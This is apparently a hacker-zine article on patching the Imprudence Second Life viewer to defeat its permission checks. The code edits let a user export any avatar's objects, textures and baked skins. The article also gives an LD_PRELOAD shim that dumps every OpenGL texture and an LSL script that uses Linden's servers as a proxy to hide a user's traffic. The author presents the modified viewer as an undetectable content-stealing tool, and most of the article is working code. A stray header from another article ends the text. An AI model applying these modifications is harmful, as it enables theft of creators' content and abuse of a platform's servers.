|=------------------------=[ 10010110111001110011 ]=---------------------=|
|
|
|=------------------------=[ 01110011011001010111 ]=---------------------=|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
Index
|
|
|
|
------[ N. Preamble
|
|
------[ I. Part I - Objects
|
|
------[ II. Part II - Textures
|
|
II. i. Textures - GLIntercept
|
|
------[ III. Postamble
|
|
------[ B. Bibliography
|
|
------[ A. Appendix
|
|
|
|
|=-----------------------------------------------------------------------=|
|
|
|
|
------[ N. Preamble
|
|
|
|
Second Life [1] is a virtual universe created by Linden Labs [2] which
|
|
allows custom content to be created by uploading different file formats. It
|
|
secures that content with a permission mask "Modify / Copy / Transfer",
|
|
which allows creators to protect their objects from being modified, copied
|
|
or transferred from avatar to avatar. The standard viewer at the time of
|
|
this writing is 2.x but the 1.x old codebase is still around and it is
|
|
still the most wide-spread one. Then, we have third party viewers, and
|
|
those are viewers forked off the 1.x codebase and then "extended" to modify
|
|
the UI and add features for convenience.
|
|
|
|
Second Life works on the principle of separately isolated servers called
SIMs (from "simulator", recently renamed to "Regions") which are
interconnected to form grids. The reasoning is that if one SIM goes down,
it becomes unavailable but does not take down the entire grid. A grid is
just a collection of individual SIMs (regions) bunched together.
|
|
|
|
Avatars are players that connect to the grid using a viewer and navigate
|
|
the SIMs by "teleporting" from one SIM to the other. Technically, that
|
|
just means that the viewer is instructed to connect to the address of a
|
|
different SIM.
|
|
|
|
A viewer is really just a Linden version of a web browser (literally) which
|
|
relies on loads of Open Source software to run. It renders the textures
|
|
around you by transferring them from an asset server. The asset server is
|
|
just a container that stores all the content users upload onto Second Life.
|
|
Whenever you connect to a SIM, all the content around you gets transferred
|
|
to your viewer, just like surfing a website.
|
|
|
|
There are a few content types in Second Life that can be uploaded by users:
|
|
|
|
1.) Images
|
|
2.) Sounds
|
|
3.) Animations
|
|
|
|
Whenever I talk about "textures", I am talking about the images that users
|
|
have uploaded onto Second Life. In order to upload one of them onto Second
|
|
Life, you have to pay 10 Linden dollars. Linden maintains a currency
|
|
exchange from Linden dollars to real dollars.
|
|
|
|
At any point, depending on the build permission of the SIM you are
|
|
currently on, you are able to create objects. Those are just basic
|
|
geometric shapes called primitives, (or prims for short) such as cubes,
|
|
spheres, prisms, etc... After you have created a primitive, you can
decorate it with images or use the Linden Scripting Language (LSL) [3] to
trigger
|
|
the sounds you uploaded or animate avatars like yourself. There is a lot
|
|
to say about LSL, but it exceeds the scope of the article. You can also
|
|
link several such primitives together to form a link set which, in turn,
|
|
is called an object. (LISP fans dig in, Second Life is all about lists -
|
|
everything is a list.)
|
|
|
|
Coming back to avatars, your avatar has so called attachment-points which
|
|
allow you to attach such an object to yourself. Users create content, such
|
|
as hats, skirts, and so on and they sell them to you and you attach them to
|
|
these attachment points.
|
|
|
|
In addition to that, there are such things called wearables. Those are
|
|
different from attachments because they are not made up of objects but they
|
|
are rather simple textures that you apply to yourself. Those do not have
|
|
any geometric properties in-world and function on the principle of layers,
|
|
hiding the layer underneath. Finally, you have body parts which are also
|
|
just textures. For example, eyes, your skin.
|
|
|
|
The wearable layers get superimposed (baked) on you. For example, if you
|
|
wear a skin and a T-shirt, the T-shirt texture will hide part of the skin
|
|
texture underneath it.
|
|
|
|
We are going to take a standard viewer: we will use the Imprudence [4]
|
|
viewer, the current git version of which has such an export feature and we
|
|
are going to modify it so it will allow exports of any in-world object.
|
|
Later on, the usage of GLIntercept [7] will be mentioned since it can be
|
|
used to export the wearables and the body parts mentioned which are just
|
|
textures.
|
|
|
|
Why does this work? There are a number of restrictions which are enforced
|
|
by the server, and a number of actions that the server cannot control. For
|
|
example, every action you trigger in Second Life usually gets a permission
|
|
check with the SIM you are triggering the action on. Your viewer interprets
|
|
the response from the SIM and if it is given the green light, your viewer
|
|
goes ahead and performs the action you requested.
|
|
|
|
Say, for example, that the viewer does not care whether the SIM approves it
|
|
or not and just goes ahead and does it anyway. Will that work? It depends
|
|
whether the SIM checks again. Some viewers have a feature called "Enable
|
|
always fly.", which allows you to fly around in no-fly zones which is an
|
|
instance of the problem. The SIM hints the viewer that it is a no-fly zone,
|
|
however the viewer ignores it and allows you to fly regardless.
|
|
|
|
Every avatar is independent in this aspect and protected from other avatars
|
|
by a liability dumping prompt. Whenever an avatar wants to interact with
|
|
you, you are prompted to allow them permission to do so. However, the
|
|
graphics are always displayed and your viewer renders other avatars without
|
|
any checks. One annoyance, for example, is to spam particles generated by
|
|
LSL. Given a sufficiently slow computer, your viewer will end up
|
|
overwhelmed and crash eventually. These days, good luck with that...
|
|
|
|
But how do we export stuff we do not own, doesn't the server check for
|
|
permissions? Not really, we are not going to "take" the object in the sense
|
|
of violating the Second Life permissions. We are going to scan the object
|
|
and note down all the parameters that the viewer can see. We are then going
|
|
to store that in an XML file along with the textures as well. This will be
|
|
done automatically using Imprudence's "Export..." feature.
|
|
|
|
Whenever you upload any of the content types mentioned in the previous
|
|
chapter, the Linden asset server generates an asset ID which is basically
|
|
an UUID that references the content you uploaded. The asset server
|
|
(conveniently for us) does not carry out any checks to see whether there is
|
|
a link between an object referencing that UUID and the original uploader.
|
|
Spelled out, if you manage to grab the UUID of an asset, you can reference
|
|
it from an object you create.
|
|
|
|
For example, if a user has uploaded a texture and I manage to grab the UUID
|
|
of the texture generated by the asset server, then I can use LSL to display
|
|
it on the surface of a primitive. It is basically just security through
|
|
obscurity (and bugs)...
|
|
|
|
------[ I. Part I - Objects
|
|
|
|
The "Export..." feature on the viewers we attack is not an official feature
|
|
but rather a feature implemented by the developers of the viewers
|
|
themselves. That generally means that the viewer only implements certain
|
|
checks at the client level without them being enforced by the server. The
|
|
"Export..." feature is just a dumb feature which scans the object's
|
|
measurements, grabs the textures and dumps the data to an XML file and
|
|
stores image files separately.
|
|
|
|
Since it is a client-side check, we can go ahead and download Imprudence
|
|
(the same approach would work on the Phoenix [5] client too) and knock out
|
|
all these viewer checks.
|
|
|
|
After you cloned the Imprudence viewer from the git repo, the first file we
|
|
edit is at linden/indra/newview/primbackup.cpp.
|
|
|
|
Along the very first lines there is a routine that sets the default
textures. I do not think this one is needed to make our "Export..." work,
but it is a good introduction to what is going on in this article:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
void setDefaultTextures()
|
|
{
|
|
if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
|
|
{
|
|
// When not in SL (no texture perm check needed), we can
|
|
// get these defaults from the user settings...
|
|
LL_TEXTURE_PLYWOOD =
|
|
LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
|
|
LL_TEXTURE_BLANK =
|
|
LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
|
|
if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
|
|
{
|
|
// This control only exists in the
|
|
// AllowInvisibleTextureInPicker patch
|
|
LL_TEXTURE_INVISIBLE =
|
|
LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
|
|
}
|
|
}
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
The viewer uses a method isSecondLife() to check if it is currently on the
|
|
official grid. Depending on the outcome of this method, the viewer
|
|
internally takes decisions on whether certain things are allowed so that
|
|
the viewer will conform to the Linden third-party viewer (TPV) policy [6].
|
|
The TPV policy is a set of rules that the creator of a viewer has to
|
|
respect so that the viewer will be granted access to the Second Life grid
|
|
(ye shall not steal, ye shall not spam, etc...).
|
|
|
|
However, these checks are client-side only. They are used internally within
|
|
the viewer and they have nothing to do with the Linden servers. What we do,
|
|
is knock them out so that the viewer does not perform the check to see if
|
|
it is on the official grid. In this particular case, we can knock out the
|
|
check easily by eliminating the if-clause, like so:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
void setDefaultTextures()
|
|
{
|
|
//if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
|
|
//{
|
|
// When not in SL (no texture perm check needed), we can
|
|
// get these defaults from the user settings...
|
|
LL_TEXTURE_PLYWOOD =
|
|
LLUUID(gSavedSettings.getString("DefaultObjectTexture"));
|
|
LL_TEXTURE_BLANK =
|
|
LLUUID(gSavedSettings.getString("UIImgWhiteUUID"));
|
|
if (gSavedSettings.controlExists("UIImgInvisibleUUID"))
|
|
{
|
|
// This control only exists in the
|
|
// AllowInvisibleTextureInPicker patch
|
|
LL_TEXTURE_INVISIBLE =
|
|
LLUUID(gSavedSettings.getString("UIImgInvisibleUUID"));
|
|
}
|
|
//}
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Without this check, the viewer assumes that we are on any grid but the
|
|
Second Life grid. You probably can notice that these checks are completely
|
|
boilerplate.
|
|
|
|
Let us move on to the next stop. Somewhere in
|
|
linden/indra/newview/primbackup.cpp you will find the following:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
|
|
{
|
|
if(gHippoGridManager->getConnectedGrid()->isSecondLife())
|
|
{
|
|
// In Second Life, you must be the creator to be permitted to
|
|
// export the asset.
|
|
return (gAgent.getID() == item_permissions->getOwner() &&
|
|
gAgent.getID() == item_permissions->getCreator() &&
|
|
(PERM_ITEM_UNRESTRICTED & item_permissions->getMaskOwner())
|
|
== PERM_ITEM_UNRESTRICTED);
|
|
}
|
|
else
|
|
{
|
|
// Out of Second Life, simply check that you're the owner and the
|
|
// asset is full perms.
|
|
return (gAgent.getID() == item_permissions->getOwner() &&
|
|
(item_permissions->getMaskOwner() & PERM_ITEM_UNRESTRICTED)
|
|
== PERM_ITEM_UNRESTRICTED);
|
|
}
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
This checks to see if you have full permissions, and are the owner and the
|
|
creator of the object you want to export. This only applies to the Second
|
|
Life grid. If you are not on the Second Life grid, then it checks to see if
|
|
you are the owner and have full permissions. We will not bother and will
|
|
modify it to always return that all our permissions are in order:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
bool PrimBackup::validatePerms(const LLPermissions *item_permissions)
|
|
{
|
|
return true;
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
The next stop is in the same file, at the following method:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
|
|
{
|
|
if (!gHippoGridManager->getConnectedGrid()->isSecondLife())
|
|
{
|
|
// If we are not in Second Life, don't bother
|
|
return asset_id;
|
|
}
|
|
|
|
LLUUID texture = LL_TEXTURE_PLYWOOD;
|
|
if (asset_id == texture ||
|
|
asset_id == LL_TEXTURE_BLANK ||
|
|
asset_id == LL_TEXTURE_INVISIBLE ||
|
|
asset_id == LL_TEXTURE_TRANSPARENT ||
|
|
asset_id == LL_TEXTURE_MEDIA)
|
|
{
|
|
// Allow to export a grid's default textures
|
|
return asset_id;
|
|
}
|
|
LLViewerInventoryCategory::cat_array_t cats;
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
There is a complete explanation of what this does in the comments. This
|
|
checks to see whether you are in Second Life, and if you are, it goes
|
|
through a series of inefficient and poorly coded checks to ensure that you
|
|
are indeed the creator of the texture by testing whether the texture is in
|
|
your inventory. We eliminate those checks and make it return the asset ID
|
|
directly:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
LLUUID PrimBackup::validateTextureID(LLUUID asset_id)
|
|
{
|
|
return asset_id;
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Once you compile the modified viewer, you will be able to export any
|
|
object, along with its textures that you can see in-world. The next step is
|
|
to modify the skin (i.e. Imprudence's user interface) so that you may
|
|
export attachments from the GUI.
|
|
|
|
First, let us enable the pie "Export..." button. I will assume that you use
|
|
the default skin. The next stop is at
|
|
linden/indra/newview/skins/default/xui/en-us/menu_pie_attachment.xml. You
|
|
will need to add:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
<menu_item_call enabled="true" label="Export" mouse_opaque="true"
|
|
name="Object Export">
|
|
<on_click function="Object.Export" />
|
|
<on_enable function="Object.EnableExport" />
|
|
</menu_item_call>
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Now, we need to enable it for any avatar at
|
|
linden/indra/newview/skins/default/xui/en-us/menu_pie_avatar.xml. You will
|
|
need to add:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
<menu_item_call enabled="true" label="Export" mouse_opaque="true"
|
|
name="Object Export">
|
|
<on_click function="Object.Export" />
|
|
<on_enable function="Object.EnableExport" />
|
|
</menu_item_call>
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
After that, we must add them so the viewer picks up the skin options. We
|
|
open up linden/indra/newview/llviewermenu.cpp and add in the avatar pie
|
|
menu section:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
// Avatar pie menu
|
|
...
|
|
addMenu(new LLObjectExport(), "Avatar.Export");
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
We do the same for the attachments section:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
// Attachment pie menu
|
|
...
|
|
|
|
addMenu(new LLObjectEnableExport(), "Attachment.EnableExport");
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Now we are set. However, the viewer performs a check in "EnableExport" in
|
|
linden/indra/newview/llviewermenu.cpp which we need to knock out:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
class LLObjectEnableExport : public view_listener_t
|
|
{
|
|
bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
|
|
{
|
|
LLControlVariable* control =
|
|
gMenuHolder->findControl(userdata["control"].asString());
|
|
|
|
LLViewerObject* object =
|
|
LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
|
|
|
|
if((object != NULL) &&
|
|
(find_avatar_from_object(object) == NULL))
|
|
{
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
The code initially checks whether the object exists and whether it is worn
by an avatar, and then applies permission validations to all the children
(links) of the object. If the object exists, is not worn by an avatar and
all the permissions of all child objects are correct, the viewer enables
the "Export..." control. Since we do not care either way, we enable the
control regardless of these checks.
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
class LLObjectEnableExport : public view_listener_t
|
|
{
|
|
bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
|
|
{
|
|
LLControlVariable* control =
|
|
gMenuHolder->findControl(userdata["control"].asString());
|
|
|
|
LLViewerObject* object =
|
|
LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
|
|
|
|
if(object != NULL)
|
|
{
|
|
control->setValue(true);
|
|
return true;
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
I have left the NULL check for the object since if you happen to mis-click
|
|
and select something other than an object, then the "Export..." pie menu
|
|
will be enabled and your viewer will crash. More precisely, if you instruct
|
|
the viewer to export something using the object export feature, and it is
|
|
not an object, the viewer will crash since there are no checks performed
|
|
after this step.
|
|
|
|
Further on in linden/indra/newview/llviewermenu.cpp there is another test
|
|
to see whether the object you want to export is attached to an avatar. In
|
|
that case, the viewer considers it an attachment and disallows exporting.
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
class LLObjectExport : public view_listener_t
|
|
{
|
|
bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
|
|
{
|
|
LLViewerObject* object =
|
|
LLSelectMgr::getInstance()->getSelection()->getPrimaryObject();
|
|
if (!object) return true;
|
|
|
|
LLVOAvatar* avatar = find_avatar_from_object(object);
|
|
|
|
if (!avatar)
|
|
{
|
|
PrimBackup::getInstance()->exportObject();
|
|
}
|
|
|
|
return true;
|
|
}
|
|
};
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Again, we proceed the same way and knock out that check which will allow
|
|
us to export objects worn by any avatar:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
class LLObjectExport : public view_listener_t
|
|
{
|
|
bool handleEvent(LLPointer<LLEvent> event, const LLSD& userdata)
|
|
{
|
|
PrimBackup::getInstance()->exportObject();
|
|
|
|
return true;
|
|
}
|
|
};
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
These changes will be sufficient in order to transform your viewer into an
|
|
undetectable tool that will allow you to export any object along with the
|
|
associated textures.
|
|
|
|
There are indeed easier ways, for example toggling God mode from the
|
|
source code and bypassing most checks. However, that will be discussed
|
|
in the upcoming full article, along with explanations on what Linden are
|
|
able to detect and wearable exports.
|
|
|
|
Alternatively, and getting closer to a "bot", there are ways to program
|
|
a fully non-interactive client [11] that will export everything it sees
|
|
automatically. This will also be covered in the upcoming article since it
|
|
takes a little more than hacks. The principle still holds: "who controls
|
|
an asset UUID, has at least permission to grab the asset off the asset
|
|
server".
|
|
|
|
------[ II. Part II - Textures
|
|
|
|
In the first part we have talked about exporting objects. There is more fun
|
|
you can have with the viewer too, for example, grabbing any texture UUID,
|
|
or dumping your skin and clothes textures.
|
|
|
|
What can we do about clothes? If you have an outfit you would like to grab,
|
|
with the previous method you will only be able to export primitives without
|
|
the wearable clothes. How about backing up your skin?
|
|
|
|
The 1.x branch of the Linden viewer has an option, disabled by default and
|
|
only accessible to grid Gods, which will allow you to grab baked textures.
|
|
Grid Gods are essentially Game Masters; in the case of Second Life, they
are the "Linden"s, Linden Labs employees represented in-world by avatars,
conventionally having "Linden" as their avatar's last name.
|
|
|
|
We open up linden/indra/newview/llvoavatar.cpp and we find:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
|
|
{
|
|
// Check if the texture hasn't been baked yet.
|
|
if (!isTextureDefined(index))
|
|
{
|
|
lldebugs << "getTEImage( " << (U32) index << " )->getID()
|
|
== IMG_DEFAULT_AVATAR" << llendl;
|
|
return FALSE;
|
|
}
|
|
|
|
if (gAgent.isGodlike() && !gAgent.getAdminOverride())
|
|
return TRUE;
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Aha, so it seems that grid Gods are permitted to grab textures. That is
fine -- now so can we:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
BOOL LLVOAvatar::canGrabLocalTexture(ETextureIndex index)
|
|
{
|
|
// Check if the texture hasn't been baked yet.
|
|
if (!isTextureDefined(index))
|
|
{
|
|
lldebugs << "getTEImage( " << (U32) index << " )->getID()
|
|
== IMG_DEFAULT_AVATAR" << llendl;
|
|
return FALSE;
|
|
}
|
|
|
|
return TRUE;
|
|
|
|
if (gAgent.isGodlike() && !gAgent.getAdminOverride())
|
|
return TRUE;
|
|
|
|
// yadda, yadda, yadda, blah, blah, blah...
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
But that is not sufficient. The 1.x viewer code has an error (perhaps
|
|
intentional) which will crash the viewer when you try to grab the lower
|
|
part of your avatar. In the original code at
|
|
linden/indra/newview/llviewermenu.cpp, we have:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
else if ("lower" == texture_type)
|
|
{
|
|
handle_grab_texture( (void*)TEX_SKIRT_BAKED );
|
|
}
|
|
else if ("skirt" == texture_type)
|
|
{
|
|
handle_grab_texture( (void*)TEX_SKIRT_BAKED );
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
Which must be changed to:
|
|
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
else if ("lower" == texture_type)
|
|
{
|
|
handle_grab_texture( (void*)TEX_LOWER_BAKED );
|
|
}
|
|
else if ("skirt" == texture_type)
|
|
{
|
|
handle_grab_texture( (void*)TEX_SKIRT_BAKED );
|
|
}
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
You are now free to recompile, go to the menu and dump the textures baked
on you, including your skin. To grab your skin, undress your avatar and
grab the textures; you can then export them using the method from Part I.
For clothes, do the same with your avatar dressed: grab the relevant
textures and export them the same way.
|
|
|
|
You might notice that the texture dumped to your inventory is temporary.
That is, it is not an asset registered with the asset server. Make sure
you save the texture or, if you want to save a bunch of them, go back to
the first part of the article: place the textures on a primitive and
export the entire primitive.
|
|
|
|
Since the textures are baked, they represent an overlay of your skin and
|
|
your clothes. If you want to extract just the clothes, you might need to
|
|
edit the grabbed textures in a graphics editing program to cut out the skin
|
|
parts. However, it might be possible to use a transparent texture for your
|
|
skin when you grab the textures. In that case, you will not have to edit
|
|
the clothes at all.
|
|
|
|
|
|
II. i. Textures - GLIntercept
|
|
|
|
The GLIntercept method involves grabbing a copy of GLIntercept [7] and
replacing the viewer's opengl .dll file with the GLIntercept one. Once
that is done, when you run the Second Life viewer all the textures will
be stored on your hard drive in the images directory. It is a
resource-consuming procedure because any texture that your viewer sees is
saved to your hard drive.
|
|
|
|
Therefore, if your only interest is to amass a collection of textures,
then get GLIntercept and, after installing it, replace the opengl .dll in
your viewer directory with the one from GLIntercept. If you cannot find
the viewer's opengl .dll, just copy the GLIntercept one in as a new file;
the viewer will pick it up. I recommend setting your graphics all the way
down to low and taking it easy because, in the background, the GLIntercept
.dll will create an images directory and dump all the possible textures,
including the textures belonging to the UI.
|
|
|
|
There is a lot of fuss going on about GLIntercept. Some strange people say
it does not work anymore and some funny people come up with ideas like
encrypting the textures. The principle that GLIntercept works on is
trivial to the point of making the whole fuss meaningless. GLIntercept,
when used in conjunction with the viewer, is an extra layer between your
viewer and opengl. Anything that your graphics card renders can be
grabbed; together with other similar software [8], the same effect
described in this article can be achieved, although it would require you
to convert the grabbed structures to the Second Life format. The usage of
GLIntercept is not restricted to Second Life: you can go ahead and grab
anything you like from any program that uses opengl. It literally puts a
dent (crater?) into content stealing, the important phrase being:
"anything that your graphics card renders, can be grabbed".
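
To make the principle tangible, here is a minimal sketch of the same idea
-- not GLIntercept itself, but a hypothetical interposing shim, assuming a
GNU/Linux build of the viewer and LD_PRELOAD (GLIntercept proper stands in
for the Windows opengl32.dll). It simply copies whatever texture data the
application hands to OpenGL:

+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
/*
 * texdump.c -- illustrative only, not GLIntercept: interpose on
 * glTexImage2D() and dump every texture the application uploads.
 * Assumed setup: GNU/Linux viewer build, dynamic libGL, LD_PRELOAD.
 *
 *   gcc -shared -fPIC texdump.c -o texdump.so -ldl
 *   LD_PRELOAD=./texdump.so ./secondlife
 */
#define _GNU_SOURCE
#include <dlfcn.h>
#include <stdio.h>
#include <GL/gl.h>

typedef void (*teximage2d_t)(GLenum, GLint, GLint, GLsizei, GLsizei,
                             GLint, GLenum, GLenum, const GLvoid *);

void glTexImage2D(GLenum target, GLint level, GLint internalformat,
                  GLsizei width, GLsizei height, GLint border,
                  GLenum format, GLenum type, const GLvoid *pixels)
{
    static teximage2d_t real = NULL;
    static int n = 0;

    if (!real)  /* look up the real entry point behind us */
        real = (teximage2d_t)dlsym(RTLD_NEXT, "glTexImage2D");
    if (!real)
        return;

    /* only the plain uncompressed RGBA case is handled in this sketch */
    if (pixels && format == GL_RGBA && type == GL_UNSIGNED_BYTE) {
        char name[64];
        snprintf(name, sizeof(name), "tex_%04d_%ldx%ld.raw",
                 n++, (long)width, (long)height);
        FILE *f = fopen(name, "wb");
        if (f) {
            fwrite(pixels, 4, (size_t)width * (size_t)height, f);
            fclose(f);
        }
    }

    real(target, level, internalformat, width, height, border,
         format, type, pixels);
}
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++

The same trick extends to every other entry point the viewer calls; once
the data has to reach the GPU, no amount of "texture encryption" higher up
can keep it from being grabbed.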
|
|
|
|
------[ IV. Postamble
|
|
|
|
Second Life is a vanity driven virtual universe which is plagued by the
|
|
most horrible muppets that fake anonymity could spawn. The Lindens maintain
|
|
full control and all the content you upload automatically switches
|
|
ownership to Linden Labs via the Terms of Service which make you renounce
|
|
your copyright. Not only that, but there are plenty of rumours you are
|
|
tracked and they have a dodgy "age-verification" system in place which
|
|
forces you to send your ID card to be checked by "a third party". Under
|
|
these circumstances, it is of course questionable what they do with that
|
|
data and whether they link your in-world activities to your identity.
|
|
|
|
There is more that could potentially be done: the viewers are frail,
incredibly poorly coded from all perspectives, and certainly not the
quality you would expect from an institution that makes billions of
shineys. There have been exploits before, such as Charlie Miller's
QuickTime exploit [9], which was able to gain full control of your
machine (patched now), and Michael Thumann's excellent presentation goes
over many concepts of Second Life as well as how they can be abused [10].
|
|
|
|
One of the further possibilities I have been looking into (closely related
|
|
to Michael Thumann's presentation) is to use LSL and create an in-world
|
|
proxy that will enable your browser to connect to a primitive in-world and
|
|
bounce your traffic. There is a limitation imposed on the amount of
|
|
information an LSL script can retrieve off the web; however, I am still
looking into ways to circumvent that. Essentially the idea would be to
use the Linden Labs servers as a proxy to carry out all the surfing. At
the time of writing this article, I do have a working LSL implementation
(you can see an example of it in [A. 1]) that can grab 2kb off any
website (this is a limitation imposed by the LSL function
llHTTPRequest()). Additionally, a PHP page could be created that rewrites
the content sent back by the LSL script so that the links send their
requests back through the script in Second Life.
|
|
|
|
Not only IPs, but also headers, timezones, DNS requests and everything
else get spoofed that way.
|
|
|
|
The possibilities are limitless and I have seen viewers emerge that rely on
|
|
this concept, such as CryoLife or NeilLife. However, the identification
|
|
strings sent by the few versions lying around the net have been tagged and
|
|
any user connecting with them would be banned. If you want to amuse
|
|
yourself further, you may want to have a look at:
|
|
|
|
http://wiki.secondlife.com/wiki/User:Crone_Dryke
|
|
|
|
Dedicated to CV. Many thanks to the Phrack Staff for their help and their
|
|
interest in the article.
|
|
|
|
Thank you for your time!
|
|
|
|
------[ B. Bibliography
|
|
|
|
[1] The Second Life website,
|
|
http://secondlife.com/
|
|
[2] Linden Labs official website,
|
|
http://lindenlab.com/
|
|
[3] Linden Scripting Language LSL Wiki,
|
|
http://wiki.secondlife.com/wiki/LSL_Portal
|
|
[4] Imprudence Viewer downloads,
|
|
http://wiki.kokuaviewer.org/wiki/Imprudence:Downloads
|
|
[5] The Phoenix Viewer,
|
|
http://www.phoenixviewer.com/
|
|
[6] The third-party viewer policy,
|
|
http://secondlife.com/corporate/tpv.php
|
|
[7] GLIntercept,
|
|
http://oreilly.com/pub/h/5235
|
|
[8] Ogre exporters,
|
|
http://www.ogre3d.org/tikiwiki/OGRE+Exporters
|
|
[9] QuickTime exploit granting full access to a users machine,
|
|
http://securityevaluators.com/content/case-studies/sl/
|
|
[10] Thumann's presentation on possibilities how to exploit Second Life,
|
|
https://www.blackhat.com/presentations/bh-europe-08/Thumann/
|
|
Presentation/bh-eu-08-thumann.pdf
|
|
[11] OpenMetaverse Library for Developers,
|
|
http://lib.openmetaverse.org/wiki/Main_Page
|
|
|
|
------[ A. Appendix
|
|
|
|
[A. 1] LSL script which requests a publicly accessible URL from the
current SIM it is located on, and then acts as a proxy: HTTP requests
made to that public URL, suffixed with "?url=<some URL>" where "some URL"
represents a web address, are answered by fetching that address. The
script fetches 2k of the content and then sends it back to the browser.
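
For example, assuming the script announced a granted URL of
http://sim3015.agni.lindenlab.com:12046/cap/<key> (a made-up capability
URL, for illustration only), pointing a browser at that URL with the
suffix "?url=http://example.com" would return the first 2k of
example.com, fetched from Linden Labs' side of the network.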
|
|
|
|
key uReq;   // pending browser request we still have to answer
key sReq;   // outstanding llHTTPRequest() towards the target site

default
{
    state_entry()
    {
        // ask the SIM for a public, externally reachable URL
        llRequestURL();
    }

    changed(integer change)
    {
        if (change & CHANGED_INVENTORY) llResetScript();
    }

    http_request(key id, string method, string body)
    {
        // the SIM granted us a URL: tell the owner where to point a browser
        if (method == URL_REQUEST_GRANTED) {
            llOwnerSay(body);
            return;
        }
        // a browser hit our public URL: pull the target out of "?url=..."
        if (method == "GET") {
            uReq = id;
            list pURL = llParseString2List(
                llGetHTTPHeader(id, "x-query-string"), ["="], []);
            if (llList2String(pURL, 0) == "url")
                sReq = llHTTPRequest(llList2String(pURL, 1),
                                     [HTTP_METHOD, "GET"], "");
        }
    }

    http_response(key request_id,
                  integer status,
                  list metadata,
                  string body)
    {
        // relay (up to 2kb of) the fetched content back to the browser
        if (sReq == request_id) llHTTPResponse(uReq, 200, body);
    }
}
|
|
|
|
|
|
|=[ 0x06 ]=---=[ How I misunderstood digital radio; or,
|
|
"Weird machines" are in radio, too! - M.Laphroaig
|
|
pastor@phrack ]--=|
|
|
|
|
...there be bytes in the air
|
|
and Turing machines everywhere
|
|
|
|
